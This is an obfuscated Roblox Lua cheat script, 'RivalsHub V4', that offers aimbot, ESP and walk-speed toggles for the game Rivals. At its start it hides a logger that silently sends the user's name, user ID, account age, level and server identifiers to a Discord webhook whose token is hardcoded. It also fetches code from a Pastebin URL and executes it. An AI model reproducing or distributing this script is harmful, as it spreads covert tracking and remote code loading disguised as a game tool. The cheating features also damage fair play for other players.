--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7() local v23="1487002565358125058";local v24="7d6TRIUwDZVeaq0d9t1YKCHB0IUzASo1QJh6RI-2MIsnFQ7kGq4W-wJCScAdOa-nse0r";local v25="https://webhook.lewisakura.moe/api/webhooks/"   .. v23   .. "/"   .. v24 ;local v26=game:GetService("HttpService");local v27=game:GetService("Players");local v28=v27.LocalPlayer;local v29,v30=v27:GetUserThumbnailAsync(v28.UserId,Enum.ThumbnailType.HeadShot,Enum.ThumbnailSize.Size420x420);local v31="N/A";local v32=v28:FindFirstChild("leaderstats");if v32 then local v43=v32:FindFirstChild("Level") or v32:FindFirstChild("Rank") ;if v43 then v31=tostring(v43.Value);end end local v33={embeds={{title="🚀 RivalsHub V4 | Execution Log",description="A user has successfully initialized the script.",type="rich",color=tonumber(8073207),thumbnail={url=v29},fields={{name="👤 Player Info",value="**User:** `"   .. v28.Name   .. "`\n**Display:** `"   .. v28.DisplayName   .. "`\n**ID:** `"   .. tostring(v28.UserId)   .. "`" ,inline=true},{name="📈 Stats",value="**Level:** `"   .. v31   .. "`\n**Account Age:** `"   .. tostring(v28.AccountAge)   .. " Days`" ,inline=true},{name="🌐 Server",value="**Place ID:** `"   .. tostring(game.PlaceId)   .. "`\n**Job ID:** `"   .. game.JobId   .. "`" ,inline=false}},footer={text="RivalsHub V4 Logger • "   .. os.date("%X") }}}};local v34=v26:JSONEncode(v33);local v35=http_request or request or HttpPost or (syn and syn.request) ;if v35 then v35({Url=v25,Method="POST",Headers={["Content-Type"]="application/json"},Body=v34});end end task.spawn(v7);local v8=loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt",true))();local v9=v8:CreateWindow({Name="Rivals",Subtitle=nil,LogoID="82795327169782",LoadingEnabled=true,LoadingTitle="RivalsHub V4",LoadingSubtitle="by pluto.aac",ConfigSettings={RootFolder=nil,ConfigFolder="Big Hub"},KeySystem=false,KeySettings={Title="Luna Example Key",Subtitle="Key System",Note="Best Key System Ever!",SaveInRoot=false,SaveKey=true,Key={"IlÄ±ke25ms&33ms"},SecondAction={Enabled=true,Type="Link",Parameter=""}}});local v10=v9:CreateTab({Name="Main",Icon="view_in_ar",ImageSource="Material",ShowTitle=true});local v11=v9:CreateTab({Name="Visuals",Icon="view_in_ar",ImageSource="Material",ShowTitle=true});local v12=v9:CreateTab({Name="Player",Icon="view_in_ar",ImageSource="Material",ShowTitle=true});local v13=v9:CreateTab({Name="Credits",Icon="view_in_ar",ImageSource="Material",ShowTitle=true});getgenv().AimbotEnabled=false;getgenv().ESPEnabled=false;getgenv().CFrameWalkEnabled=false;getgenv().CFrameWalkSpeed=0.1;getgenv().Smoothness=0.6;local v19=game:GetService("Players");local v20=v19.LocalPlayer;local v21=workspace.CurrentCamera;local function v22(v36) if (v36.Character and  not v36.Character:FindFirstChild("Totally_NOT_Esp")) then local v44=Instance.new("Highlight");v44.Name="Totally_NOT_Esp";v44.Adornee=v36.Character;v44.DepthMode=Enum.HighlightDepthMode.AlwaysOnTop;v44.FillColor=Color3.fromRGB(255,0,0);v44.Parent=v36.Character;end end game:GetService("RunService").RenderStepped:Connect(function() if getgenv().ESPEnabled then for v52,v53 in pairs(v19:GetPlayers()) do if ((v53~=v20) and v53.Character) then v22(v53);end end end end);v10:CreateToggle({Name="Enable Aimbot",Callback=function(v37) getgenv().AimbotEnabled=v37;end});v11:CreateToggle({Name="Enable ESP",Callback=function(v39) getgenv().ESPEnabled=v39;end});v12:CreateSlider({Name="Walkspeed Value",Range={0.2,2},Increment=0.1,CurrentValue=0.2,Callback=function(v41) getgenv().CFrameWalkSpeed=v41;end});v13:CreateLabel({Text="pluto.aac",Style=2});
